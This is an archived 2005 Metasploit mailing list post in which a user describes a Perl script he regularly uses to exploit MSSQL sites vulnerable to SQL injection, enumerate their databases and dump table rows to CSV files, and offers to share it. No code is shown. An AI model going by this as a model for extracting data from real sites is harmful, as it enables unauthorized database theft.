Metasploit mailing list archives

using Meterpreter , out of MSF // SQL Injection module

From: RaMatkal at hotmail.com (RaMatkal)
Date: Thu, 27 Oct 2005 14:10:24 +0200

I have written a perl script which i regularly use that exploits sites
vulnerable to SQL injection running MSSQL....

It enumerates the database and is able to write the first 'x' rows of each
table into .csv files....

Never thought about integrating it into metasploit though....

Let me know if anyone is interested in this...